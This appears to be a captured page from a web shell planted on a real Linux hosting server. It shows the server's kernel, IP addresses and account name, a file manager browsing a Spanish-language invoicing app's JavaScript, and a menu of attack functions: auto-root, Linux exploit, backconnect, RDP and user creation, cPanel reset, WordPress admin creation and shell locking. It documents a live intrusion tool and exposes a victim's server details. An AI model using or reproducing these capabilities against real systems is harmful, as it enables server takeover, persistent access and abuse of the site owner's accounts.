Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.54
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
.trash /
public /
js /
proforma /
[ HOME SHELL ]
Name
Size
Permission
Action
detalles.js
11.67
KB
-rw-r--r--
detalles_deuda.js
3.2
KB
-rw-r--r--
detalles_operario.js
1.19
KB
-rw-r--r--
nuevo.js
22.5
KB
-rw-r--r--
venta.js
21.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : detalles_operario.js
$(function () { /******************************************************************************/ /* ACTUALZAR ESTADO DEL PEDIDO /******************************************************************************/ $('.btn_actualizar').on('click', function() { var estado = $(this).data('estado'); $('#update_modal').modal({ closable: false, onApprove : function() { sendForm(estado); } }).modal('show'); }); function sendForm(estado) { var id_proforma = $('#id_proforma').val(); var avance = estado; $.requestApi('/proforma/actualizar_avance', {'id_proforma' : id_proforma, 'avance' : avance}, 'POST', function (resolve) { if (resolve) { $.showMessages(resolve, true, APP_URL+'/proforma/detalles_operario/'+id_proforma ); } }); return false; }; /******************************************************************************/ /* iniciailiza el progress bar /******************************************************************************/ $(document).ready(function(){ $('.ui.progress').progress(); }); });
Close